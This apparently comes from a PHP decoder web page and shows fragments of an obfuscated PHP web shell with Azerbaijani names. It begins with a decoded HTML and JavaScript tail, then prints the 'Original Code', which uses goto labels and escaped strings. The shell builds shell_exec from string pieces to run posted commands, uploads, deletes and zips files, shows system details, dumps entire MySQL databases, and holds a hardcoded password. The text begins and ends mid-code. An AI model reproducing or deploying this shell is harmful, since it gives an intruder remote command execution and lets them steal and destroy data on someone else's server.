(isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $yeniTook = md5(shifrele(time() . rand(1, 99999999))); $_SESSION[$tAd] = $yeniTook; return $yeniTook; } goto S2ToV; VVn9w: $baqliFunksiyalar = explode(",", ''); goto mA406; x_mUh: ?> 
&zf="+e)}function shifrelee(){var e=document.getElementsByClassName("file_edit")[0].value,n=["a","i","e","s","l","b","u","o","p","h","\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];for(var t in n){var i=n[t];e=e.replace(new RegExp(i,"g"),"|:"+t+":|")}document.getElementsByClassName("file_edit")[0].value=e}document.getElementById("emr_et_atash").addEventListener("keyup",function(e){e.preventDefault(),13===e.keyCode&&sistemKom()})</script></body></html>

Did this file decode correctly?

Original Code


goto KsmzR; HawB1: ?>
")}function skl_bas(){sehife("?ne=skl&emr="+b64EncodeUnicode(document.getElementById("skl_emr").value))}function b64EncodeUnicode(e){return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g,function(e,n){return String.fromCharCode("0x"+n)}))}function goto(){var e=prompt("Dir:");e&&sehife("?qovluq="+e)}function ziple(e){var n=prompt("Dir:","<?php  goto smBkZ; chF3P: ?>
')">Icra edin</a><br><a href="javascript:sehife('?ne=skl');">SQL</a><br><form method="POST"enctype="multipart/form-data"><input value="fayl_upl"name="ne"type="hidden"> <input value="<?php  goto tYYXW; thipm: ?>
"name="qovluq"type="hidden"> <input name="ufayl"type="file"> <input value="Upl"type="submit"></form><form method="POST"id="post_form"style="display:none"></form><script>function sehife(e){var n="";if(void 0!==(e=e.split("?"))[1]){for(var t in e=e[1].split("&")){var i=e[t].split("=");void 0!==i[1]&&(n+="<input name='"+i[0]+"' value='"+i[1]+"' type='hidden'>")}document.all("post_form").innerHTML=n,document.all("post_form").submit()}}function faylSil(e){confirm("Eminsen atash?")&&sehife(e)}function faylSifirla(e){confirm("Eminsen atash?")&&sehife(e)}function changeFileName(e,n){var t=prompt("Change file name:",e);t&&sehife(n+"&new_name="+t)}function newFile(){var e=prompt("File name:");e&&sehife("?ne=fayl_yarat&ad="+e+"&qovluq=<?php  goto qBR_a; xggtV: ?>
")}function sistemKom(){var e=document.getElementById("emr_et_atash").value;e&&sehife("?ne=sistem_kom&kom="+b64EncodeUnicode(e)+"&qovluq=<?php  goto yX2dP; tYYXW: echo urlencode(shifrele($default_dir)); goto thipm; FHhBZ: ?>
");n&&sehife("?ne=ziple&qovluq=<?php  goto ZgcDO; Cd3Vj: print "\74\x73\160\141\156\40\x63\x6c\141\163\163\75\x27\161\141\x6c\151\156\x27\76\123\141\146\145\x20\x6d\157\x64\x65\72\40\74\57\163\160\x61\156\x3e" . ($safeMode === true ? "\x3c\x73\x70\x61\156\40\x63\x6c\141\x73\163\x3d\x27\x62\141\x64\47\76\x4f\156" : "\74\163\x70\141\156\x20\x63\154\141\163\163\75\47\163\x75\x63\x63\x65\x73\x73\x27\76\117\146\x66") . "\x3c\57\x73\160\x61\156\x3e\x3c\163\x70\141\x6e\40\163\x74\171\x6c\x65\75\47\155\141\x72\147\151\x6e\55\x6c\145\x66\x74\72\40\65\60\160\170\x3b\x27\76\74\141\40\x68\x72\x65\x66\x3d\47\x6a\141\x76\141\163\143\x72\x69\160\164\72\x73\x65\x68\x69\x66\x65\x28\x22\77\156\145\75\x70\150\160\151\x6e\146\157\42\x29\x27\76\133\40\x50\x48\x50\151\x6e\x66\157\x20\135\74\x2f\x61\x3e\x3c\x2f\x73\x70\x61\x6e\x3e\x3c\x62\x72\57\76"; goto KyG1c; j9qMq: $ne = isset($_POST["\156\145"]) && in_array($_POST["\156\145"], $actions) ? $_POST["\x6e\145"] : "\x65\x73\141\x73"; goto ZgBz1; fh9Qj: $actions = array("\145\x73\141\163", "\x66\141\171\x6c\137\157\x78\165", "\160\150\160\x69\x6e\x66\157", "\163\151\163\x74\145\155\137\x6b\157\x6d", "\x66\141\171\x6c\x5f\162\145\x64\x61\x6b\164\x65", "\x66\141\x79\x6c\137\x79\165\153\154\145", "\x66\141\171\x6c\x5f\163\x69\x6c", "\146\141\x79\x6c\x5f\171\141\x72\141\x74", "\x70\141\x70\x6b\x61\137\171\141\x72\x61\164", "\146\x61\x79\154\137\163\151\x66\x69\162\x6c\x61", "\160\141\160\153\x61\137\163\151\x6c", "\x66\x61\171\x6c\x5f\x61\x64\137\144\145\x79\x69\x73\x68", "\x7a\151\x70\x6c\145", "\x73\153\x6c", "\x73\153\154\x5f\x64\x5f\x74", "\163\153\154\x5f\x64", "\x66\141\x79\154\137\165\160\154"); goto j9qMq; DlKEc: ?>
")}function newPapka(){var e=prompt("File name:");e&&sehife("?ne=papka_yarat&ad="+e+"&qovluq=<?php  goto yneir; Pezo2: $default_dir = getcwd(); goto zZMdU; ZgBz1: function shifrele($str) { $f = "\x62\141\x73"; $f .= "\x65\66"; $f .= "\64\137"; $f .= "\x65"; $f .= "\x6e\x63"; $f .= "\157\144\x65"; return $f($str); } goto Nog08; J2W1x: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto o0obI; smBkZ: echo htmlspecialchars($default_dir); goto FHhBZ; U5wxj: if (isset($_GET["\156\145"]) && $_GET["\156\x65"] == "\160\x69\156\146") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("\142\x6f\144\x79\x20\173\142\141\x63\153\x67\162\157\165\156\144\x2d\143\x6f\154\157\162\x3a\x20\x23\x66\x66\146\146\146\146\73\40\x63\157\x6c\x6f\162\x3a\40\x23\60\x30\60\x30\60\60\73\x7d", '', $pInf); die; } else { if ($ne == "\146\141\171\x6c\x5f\171\165\x6b\154\145" && isset($_POST["\146\141\171\x6c"]) && '' != trim($_POST["\146\141\x79\154"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\x79\154"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\57" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { header("\103\x6f\x6e\164\x65\x6e\x74\55\x44\x69\x73\160\x6f\x73\x69\164\x69\157\x6e\72\40\x61\164\x74\x61\143\150\155\x65\156\164\73\x20\146\x69\x6c\145\x6e\141\155\145\x3d" . basename($faylAdi)); header("\103\x6f\x6e\164\x65\156\164\x2d\124\171\x70\145\x3a\40\141\x70\160\x6c\151\143\x61\x74\x69\157\x6e\57\157\143\164\145\164\x2d\163\x74\162\145\141\155"); header("\103\157\x6e\164\145\x6e\164\55\x4c\145\156\x67\164\150\x3a\x20" . filesize($default_dir . $ayirici . $faylAdi)); readfile($default_dir . $ayirici . $faylAdi); die; } } else { if ($ne == "\x66\141\x79\154\x5f\x73\151\x6c" && isset($_POST["\146\x61\171\154"]) && '' != trim($_POST["\x66\x61\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\x66\x61\x79\154"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\57" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { unlink($default_dir . $ayirici . $faylAdi); } } else { if ($ne == "\146\141\x79\x6c\x5f\163\151\146\x69\x72\154\x61" && isset($_POST["\146\141\x79\154"]) && '' != trim($_POST["\146\x61\x79\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\141\x79\x6c"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\57" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\x66\141\x79\154\x5f\x79\141\x72\141\x74" && isset($_POST["\141\x64"]) && !empty($_POST["\141\144"])) { $faylAdi = basename(urldecode($_POST["\141\144"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi)) { print "\74\x73\x63\162\151\160\x74\76\x61\154\x65\162\x74\x28\42\102\x75\40\x61\x64\144\x61\x20\146\x61\x79\x6c\x20\141\x72\164\151\x71\x20\x6d\157\x76\x63\x75\144\144\x75\x72\41\x22\51\73\x3c\x2f\x73\x63\x72\151\160\x74\76"; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else { if ($ne == "\x70\141\160\153\x61\x5f\171\x61\162\141\164" && isset($_POST["\x61\x64"]) && !empty($_POST["\x61\144"])) { $papkaAdi = basename(urldecode($_POST["\x61\x64"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($papkaAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $papkaAdi)) { print "\74\163\x63\162\x69\160\164\x3e\141\x6c\x65\162\x74\50\42\x42\165\x20\x61\144\144\141\40\160\x61\x70\153\x61\x20\x61\162\x74\x69\161\40\x6d\x6f\x76\x63\x75\x64\x64\x75\162\x21\42\51\x3b\74\57\163\x63\x72\x69\160\x74\76"; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else { if ($ne == "\146\141\171\x6c\x5f\141\x64\x5f\x64\145\x79\151\x73\150" && isset($_POST["\x66\141\171\154"]) && '' != trim($_POST["\x66\x61\171\154"]) && isset($_POST["\x6e\x65\x77\137\x6e\x61\x6d\x65"]) && is_string($_POST["\156\x65\167\x5f\156\141\x6d\145"]) && !empty($_POST["\156\x65\x77\x5f\x6e\141\155\145"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\x79\x6c"]))); $faylYeniAd = basename(urldecode($_POST["\x6e\x65\x77\x5f\x6e\x61\155\x65"])); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi, $default_dir . $ayirici . $faylYeniAd); } } else { if ($ne == "\163\x6b\154\137\144\x5f\164" && isset($_POST["\164"]) && is_string($_POST["\164"]) && !empty($_POST["\x74"])) { $tableName = deshifrele(urldecode($_POST["\x74"])); $host = isset($_COOKIE["\150\157\163\x74"]) ? $_COOKIE["\150\x6f\x73\164"] : ''; $user = isset($_COOKIE["\x75\x73\145\x72"]) ? $_COOKIE["\x75\x73\145\162"] : ''; $parol = isset($_COOKIE["\x70\x61\162\157\x6c"]) ? $_COOKIE["\160\141\x72\157\154"] : ''; $baza = isset($_COOKIE["\142\141\172\141"]) ? $_COOKIE["\142\x61\172\141"] : ''; $bazaStr = empty($baza) ? '' : "\x64\142\156\141\155\x65\x3d" . $baza . "\73"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\x6d\x79\x73\161\154\72\150\x6f\163\x74\x3d" . $host . "\73\143\150\141\162\x73\x65\x74\x3d\x75\164\146\x38\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\x45\124\40\x4e\x41\x4d\x45\123\x20\x27\x75\164\146\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("\123\105\114\105\103\x54\x20\143\x6f\x6c\x75\x6d\x6e\x5f\x6e\141\x6d\145\x20\x66\162\x6f\155\40\x69\156\146\157\x72\155\141\164\151\157\x6e\x5f\x73\143\x68\145\x6d\141\x2e\x63\157\154\165\155\156\x73\x20\x77\150\145\x72\x65\40\x74\141\x62\x6c\145\137\x73\x63\x68\x65\x6d\x61\75\x3f\x20\x61\x6e\144\x20\164\x61\x62\x6c\145\x5f\156\x61\155\145\75\77"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("\x53\x45\114\105\x43\x54\40\52\40\106\122\117\115\40\x60" . $tableName . "\x60"); $data = $data->fetchAll(); header("\103\157\156\164\145\x6e\164\x2d\x64\151\x73\x70\x6f\x73\x69\164\x69\x6f\x6e\72\40\141\164\164\141\x63\x68\155\145\156\x74\x3b\40\146\151\154\x65\156\141\x6d\x65\75\x64\137" . basename(htmlspecialchars($tableName)) . "\x2e\x6a\163\x6f\x6e"); header("\x43\x6f\156\164\x65\156\164\55\x74\171\160\145\x3a\x20\141\x70\160\x6c\151\x63\x61\164\151\x6f\x6e\57\152\x73\157\156"); echo json_encode($data); } else { print "\x54\141\142\x6c\x65\x20\x6e\x6f\x74\x20\146\x6f\x75\x6e\x64\41"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "\x45\162\x72\x6f\x72\41\40\x50\154\145\141\x73\x65\x20\143\x6f\156\x6e\145\x63\164\x20\x74\157\40\123\121\114\x21"; } die; } else { if ($ne == "\x73\x6b\154\x5f\x64") { $host = isset($_COOKIE["\150\x6f\163\x74"]) ? $_COOKIE["\150\157\x73\164"] : ''; $user = isset($_COOKIE["\x75\163\x65\x72"]) ? $_COOKIE["\x75\163\x65\162"] : ''; $parol = isset($_COOKIE["\160\x61\162\x6f\154"]) ? $_COOKIE["\160\x61\162\x6f\154"] : ''; $baza = isset($_COOKIE["\142\141\x7a\x61"]) ? $_COOKIE["\x62\x61\x7a\141"] : ''; $bazaStr = empty($baza) ? '' : "\144\x62\156\141\155\x65\75" . $baza . "\x3b"; if (!empty($host) && !empty($baza)) { try { $pdo = new PDO("\155\171\163\161\x6c\72\150\157\x73\x74\x3d" . $host . "\73\143\150\141\162\163\x65\164\75\x75\164\146\x38\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\x53\x45\x54\40\116\101\115\105\x53\x20\47\x75\x74\x66\70\x27")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("\x53\x45\x4c\105\x43\124\x20\x74\141\x62\x6c\x65\137\x6e\141\155\x65\x20\146\162\157\155\40\151\x6e\x66\157\x72\x6d\141\164\x69\x6f\x6e\x5f\163\x63\150\x65\x6d\141\56\x74\x61\142\x6c\145\x73\40\167\x68\x65\162\x65\40\x74\141\x62\x6c\x65\x5f\163\143\x68\145\155\141\75\77"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["\x74\x61\142\154\145\x5f\x6e\x61\155\145"]; $data = $pdo->query("\x53\105\114\105\x43\x54\x20\x2a\40\x46\122\117\x4d\x20\x60" . $tableName . "\x60"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("\103\x6f\156\164\145\x6e\164\x2d\144\x69\163\160\157\x73\x69\x74\x69\157\156\72\x20\x61\164\x74\x61\x63\150\155\145\x6e\x74\73\x20\x66\x69\x6c\145\x6e\x61\x6d\x65\75\x64\137\142\137" . basename(htmlspecialchars($baza)) . "\56\152\x73\157\x6e"); header("\103\x6f\156\164\x65\x6e\x74\55\164\171\160\x65\72\40\141\160\160\x6c\151\143\x61\164\x69\x6f\156\x2f\152\x73\x6f\x6e"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "\x45\162\162\157\162\x21\x20\x50\154\x65\x61\x73\x65\40\143\x6f\x6e\x6e\145\x63\x74\x20\x74\157\40\123\x51\114\41"; } die; } else { if ($ne == "\x7a\x69\x70\x6c\145" && isset($_POST["\163\141\x76\x65\x5f\164\x6f"], $_POST["\172\146"]) && is_string($_POST["\x73\x61\x76\x65\137\x74\157"]) && !empty($_POST["\163\141\x76\x65\137\x74\x6f"]) && !in_array($_POST["\163\141\x76\145\137\x74\157"], array("\56", "\x2e\56", "\56\57", "\56\56\57")) && is_string($_POST["\172\146"]) && !empty($_POST["\x7a\x66"])) { $save_to = deshifrele(urldecode($_POST["\x73\141\166\x65\x5f\164\157"])); $rootPath = realpath(deshifrele(urldecode($_POST["\172\x66"]))); $fileName1 = "\x62\x61\x6b\137" . microtime(1) . "\x5f" . rand(1000, 99999) . "\x2e\172\151\x70"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "\x53\141\x76\145\x64\x21\74\x68\162\x3e"; } else { print "\104\151\162\40\x69\x73\40\x6e\157\164\x20\167\162\x69\164\145\141\142\154\145\x21\74\x68\x72\x3e"; var_dump($save_to); } } else { if ($ne == "\160\141\x70\x6b\141\x5f\x73\151\x6c" && isset($_POST["\x7a\x66"]) && is_string($_POST["\172\146"]) && !empty($_POST["\172\x66"])) { $rootPath = realpath(deshifrele(urldecode($_POST["\x7a\x66"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "\x44\x69\x72\x20\151\163\40\156\x6f\x74\x20\x77\x72\x69\x74\x65\141\142\x6c\x65\x21\74\x68\162\76"; var_dump($save_to); } } else { if ($ne == "\146\x61\x79\154\x5f\165\x70\x6c" && isset($_FILES["\x75\x66\141\x79\x6c"])) { move_uploaded_file($_FILES["\x75\146\141\171\x6c"]["\x74\x6d\160\137\x6e\x61\155\x65"], $default_dir . "\x2f" . $_FILES["\165\x66\141\x79\154"]["\x6e\x61\x6d\145"]); print "\125\x70\x6c\157\x61\144\40\157\x6c\144\165\x20\x64\145\171\x65\163\x65\156\x2e"; } } } } } } } } } } } } goto ygUGz; yneir: echo urlencode(urlencode(shifrele($default_dir))); goto xggtV; yX2dP: echo urlencode(urlencode(shifrele($default_dir))); goto HawB1; MqqoL: ?>
&zf="+e+"&save_to="+b64EncodeUnicode(n))}function silPapka(e){confirm("Eminsen atash?")&&sehife("?ne=papka_sil&qovluq=<?php  goto fbJbF; ORf1s: $password = "\x35\x31\61\64\x30\62"; goto Xzy7l; Nog08: function deshifrele($str) { $f = "\142\141\x73"; $f .= "\x65\x36"; $f .= "\x34\x5f"; $f .= "\x64"; $f .= "\x65\143"; $f .= "\157\x64\145"; return $f($str); } goto mbDQb; RFMY1: if (function_exists("\x70\x6f\x73\x69\170\137\x67\145\164\145\x67\x69\x64")) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid["\156\141\x6d\145"]; print "\x3c\x73\x70\x61\156\x20\x63\154\141\x73\x73\75\47\161\x61\154\151\156\x27\76\x55\x6e\x61\x6d\145\x3a\74\57\163\x70\141\x6e\x3e\x20" . php_uname() . "\74\x62\x72\57\x3e"; print "\x3c\x73\x70\141\156\40\x63\154\141\163\163\x3d\x27\x71\x61\154\x69\x6e\47\x3e\x55\x73\x65\162\72\x3c\x2f\163\160\141\x6e\76\40" . getmyuid() . "\x20\50" . get_current_user() . "\x29\x3c\142\x72\57\76"; print "\74\x73\x70\141\156\40\x63\154\141\163\163\75\47\161\141\x6c\x69\x6e\x27\x3e\x47\162\157\165\160\72\74\57\x73\160\141\x6e\x3e\40" . getmygid() . "\40\50" . $qrup . "\x29\x3c\142\162\x2f\76"; } else { print "\74\163\160\x61\156\x20\x63\x6c\141\x73\x73\x3d\x27\161\141\x6c\x69\x6e\47\x3e\x55\x6e\x61\x6d\x65\72\x3c\x2f\x73\x70\x61\x6e\76\x20" . php_uname() . "\x3c\142\x72\x2f\76"; print "\x3c\163\x70\x61\156\x20\x63\154\x61\x73\x73\x3d\x27\161\141\x6c\151\156\x27\76\x55\163\145\162\x3a\x3c\x2f\163\160\x61\156\x3e\x20" . getmyuid() . "\40\x28" . get_current_user() . "\x29\74\142\162\57\76"; print "\x3c\x73\160\141\x6e\x20\x63\154\x61\x73\x73\75\x27\161\x61\x6c\151\156\47\x3e\107\162\x6f\165\x70\72\74\x2f\163\160\x61\156\76\40" . getmygid() . "\x3c\x62\x72\x2f\x3e"; } goto D47te; h6gu1: if ($ne == "\160\x68\x70\x69\x6e\146\x6f") { print "\x3c\144\151\166\x20\163\x74\171\x6c\x65\x3d\x27\x77\x69\144\x74\x68\72\40\x31\x30\x30\x25\x3b\40\x68\145\x69\x67\x68\x74\72\x20\x34\60\x30\160\x78\x3b\47\x3e\74\x69\146\162\141\x6d\145\x20\x73\x72\143\x3d\47\77\156\145\x3d\x70\151\156\146\47\40\x73\164\x79\154\145\75\47\x77\x69\x64\x74\x68\72\40\61\60\60\45\x3b\x20\x68\145\x69\147\150\164\72\x20\64\60\x30\160\170\73\x20\x62\x6f\x72\144\145\x72\x3a\x20\x30\x3b\47\76\x3c\57\x69\x66\162\141\x6d\x65\76\74\57\x64\x69\x76\x3e"; } else { if ($ne == "\163\x69\x73\x74\145\x6d\x5f\153\x6f\x6d") { if (isset($_POST["\153\x6f\x6d"]) && is_string($_POST["\153\157\x6d"]) && !empty($_POST["\153\x6f\155"])) { $komanda = deshifrele(urldecode($_POST["\153\x6f\155"])); $k = "\x73\x68"; $k .= "\145\x6c"; $k .= "\x6c\x5f\145"; $k .= "\170\145"; $k .= "\143"; $output = $k($komanda); print "\x3c\160\x72\x65\x20\x73\164\x79\154\x65\75\x22\155\x61\x78\x2d\x68\145\x69\x67\150\164\72\40\x33\x35\60\160\170\x3b\x6f\166\145\162\146\x6c\x6f\167\72\40\x61\x75\164\x6f\73\40\x62\157\x72\x64\145\x72\72\x20\x31\x70\170\40\163\157\154\x69\x64\40\x23\x37\x37\x37\x3b\x20\160\141\144\144\151\x6e\x67\72\40\65\160\x78\73\42\x3e" . htmlspecialchars($output) . "\74\57\160\162\x65\x3e\74\150\x72\x3e"; } print "\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x22\x74\x65\x78\164\x22\x20\x69\x64\x3d\42\145\155\x72\137\x65\164\x5f\x61\x74\x61\163\150\42\40\x73\x74\x79\154\x65\75\42\167\x69\x64\x74\150\x3a\40\x35\x30\60\160\x78\73\x22\76\40\74\142\165\164\x74\157\156\x20\164\x79\160\145\x3d\x22\x62\x75\164\164\157\156\x22\40\143\x6c\141\x73\x73\75\42\x62\164\156\x22\x20\157\156\143\154\x69\x63\x6b\75\x22\x73\151\163\x74\x65\x6d\113\x6f\x6d\50\51\x3b\42\76\102\141\163\74\57\142\165\164\x74\x6f\x6e\76"; } else { if ($ne == "\146\x61\171\x6c\137\157\170\165" && isset($_POST["\146\141\x79\x6c"]) && '' != trim($_POST["\146\141\x79\x6c"])) { $faylAdi = basename(deshifrele(urldecode($_POST["\146\x61\x79\154"]))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($faylAdi, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? "\x20\x6f\156\x63\x6c\x69\143\153\x3d\x27\163\x65\x68\151\x66\x65\50\42\x3f\x6e\x65\75\x66\x61\171\154\137\x72\145\144\141\x6b\x74\145\x26\146\141\171\154\75" . urlencode(urlencode(shifrele($faylAdi))) . "\46\x71\157\x76\x6c\165\161\x3d" . urlencode(urlencode(shifrele($default_dir))) . "\x22\51\47" : "\40\144\151\x73\141\x62\154\x65\144"; print "\x3c\144\151\166\76\x46\141\171\154\x20\x61\144\x26\x23\x33\60\x35\x3b\x3a\x20\74\x73\x70\x61\x6e\40\143\154\x61\163\x73\75\47\x71\141\x6c\151\156\x27\x3e" . htmlspecialchars($faylAdi) . "\x3c\x2f\x73\x70\141\156\x3e\74\x62\x72\57\x3e\74\x62\165\164\x74\157\156\x20\143\x6c\x61\163\163\x3d\x27\142\x74\x6e\47{$elaveBtn}\x3e\x20\104\46\43\66\60\x31\x3b\171\x69\x26\43\63\x35\61\x3b\40\74\x2f\142\x75\164\x74\x6f\156\x3e\x3c\57\144\x69\x76\x3e"; print "\74\x64\x69\x76\x20\143\154\x61\163\163\75\47\x66\141\x79\154\137\x6f\170\165\47\76" . highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true) . "\x3c\57\x64\x69\x76\x3e"; } } else { if ($ne == "\163\x6b\x6c") { $host = isset($_COOKIE["\x68\x6f\x73\164"]) ? $_COOKIE["\150\x6f\163\164"] : ''; $user = isset($_COOKIE["\165\163\x65\x72"]) ? $_COOKIE["\165\x73\x65\162"] : ''; $parol = isset($_COOKIE["\x70\141\162\x6f\x6c"]) ? $_COOKIE["\x70\141\x72\157\x6c"] : ''; $baza = isset($_COOKIE["\x62\141\172\x61"]) ? $_COOKIE["\x62\141\x7a\x61"] : ''; if (isset($_POST["\150\157\x73\x74"], $_POST["\x75\163\145\162"], $_POST["\x70\x61\x72\157\154"]) && is_string($_POST["\x68\x6f\163\164"]) && is_string($_POST["\x75\x73\145\162"]) && is_string($_POST["\160\141\x72\157\x6c"])) { $host = $_POST["\x68\x6f\x73\164"]; $user = $_POST["\x75\163\145\x72"]; $parol = $_POST["\x70\141\162\x6f\x6c"]; $baza = ''; setcookie("\x68\x6f\x73\x74", $host, time() + 360000); setcookie("\x75\x73\145\162", $user, time() + 360000); setcookie("\x70\x61\162\x6f\x6c", $parol, time() + 360000); setcookie("\142\x61\x7a\141", $baza, time() + 360000); } if (isset($_POST["\142\141\172\x61"]) && is_string($_POST["\x62\x61\x7a\x61"])) { $baza = $_POST["\142\x61\172\141"]; setcookie("\142\x61\x7a\x61", $baza, time() + 360000); } $bazaStr = empty($baza) ? '' : "\144\x62\156\x61\x6d\145\75" . $baza . "\x3b"; ?>
<form method="POST"><input value="skl"name="ne"type="hidden"> <input value="<?php  echo htmlspecialchars($host); ?>
"name="host"placeholder="Hostname"> <input value="<?php  echo htmlspecialchars($user); ?>
"name="user"placeholder="User"> <input value="<?php  echo htmlspecialchars($parol); ?>
"name="parol"placeholder="Parol"> <input value="Daxil ol"type="submit"></form><?php  if (!empty($host)) { try { $pdo = new PDO("\x6d\x79\x73\161\x6c\72\150\x6f\163\x74\x3d" . $host . "\73\x63\150\x61\162\163\x65\x74\75\x75\164\x66\70\x3b" . $bazaStr, $user, $parol, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\x45\x54\40\x4e\101\x4d\x45\x53\x20\x27\165\164\x66\x38\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("\123\x45\114\105\x43\x54\40\163\x63\150\x65\155\141\137\156\x61\x6d\145\x20\x46\x52\117\115\x20\x69\156\146\157\162\155\141\x74\x69\157\156\x5f\x73\x63\150\145\155\x61\56\x73\x63\x68\145\x6d\141\x74\141"); print "\x3c\146\157\x72\x6d\x20\155\145\x74\x68\157\x64\75\x22\120\117\123\x54\x22\x3e\x3c\x69\x6e\x70\165\x74\x20\x74\x79\x70\145\75\x22\x68\x69\x64\144\145\156\x22\x20\156\x61\155\x65\x3d\x22\x6e\x65\x22\x20\166\x61\154\x75\x65\x3d\x22\163\x6b\154\x22\76\x3c\163\145\x6c\145\x63\164\40\156\141\155\145\x3d\42\142\141\x7a\x61\42\76"; foreach ($schematas->fetchAll() as $schemaName) { print "\x3c\x6f\160\164\x69\x6f\x6e" . ($baza == $schemaName["\x73\x63\x68\x65\155\x61\x5f\x6e\x61\x6d\145"] ? "\40\163\145\154\x65\x63\164\x65\x64" : '') . "\76" . htmlspecialchars($schemaName["\x73\x63\x68\145\155\x61\x5f\x6e\141\x6d\145"]) . "\74\x2f\x6f\x70\x74\x69\157\x6e\x3e"; } print "\74\x2f\x73\x65\154\145\143\164\x3e\40\x3c\x69\156\x70\x75\164\40\164\171\160\145\x3d\x22\x73\165\x62\155\x69\164\x22\x20\166\141\x6c\165\145\x3d\42\x53\145\x63\x68\41\42\76\x3c\x2f\x66\x6f\x72\155\x3e"; if (!empty($baza)) { $tables = $pdo->prepare("\123\x45\x4c\105\103\x54\x20\x74\x61\142\154\x65\137\x6e\x61\x6d\x65\40\146\162\157\x6d\40\x69\x6e\x66\x6f\162\155\141\x74\151\157\156\137\163\143\150\145\155\x61\x2e\x74\141\142\x6c\x65\163\x20\167\x68\x65\162\x65\x20\x74\141\142\x6c\145\137\163\143\150\145\155\x61\x3d\77"); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print "\x3c\x64\x69\x76\x20\163\164\x79\x6c\x65\x3d\x22\146\x6c\x6f\x61\x74\x3a\40\x6c\x65\146\164\x3b\x20\167\x69\144\164\150\72\40\62\x30\45\x3b\x20\x6f\166\x65\x72\146\x6c\x6f\x77\72\40\141\165\x74\x6f\x3b\x20\142\x6f\x72\x64\x65\162\55\162\151\x67\x68\x74\x3a\x20\x31\x70\170\x20\x73\157\154\x69\x64\40\43\71\x39\71\x3b\42\76"; print "\74\141\40\150\x72\145\x66\75\x22\x6a\141\166\141\163\x63\162\x69\x70\x74\x3a\163\x65\150\151\x66\145\50\x27\x3f\156\x65\75\x73\153\154\x5f\x64\x27\51\x3b\x22\x3e\x21\41\40\x44\165\155\160\40\104\x42\x20\41\41\x3c\x2f\141\76\x3c\150\x72\76"; foreach ($tables as $tableName) { $tableName = $tableName["\164\141\142\154\145\x5f\156\141\x6d\x65"]; print "\x3c\x61\x20\x68\162\x65\x66\x3d\x22\152\x61\166\x61\x73\143\162\151\x70\x74\x3a\x73\145\x68\x69\x66\145\x28\x27\x3f\156\145\75\x73\153\x6c\46\x74\75" . 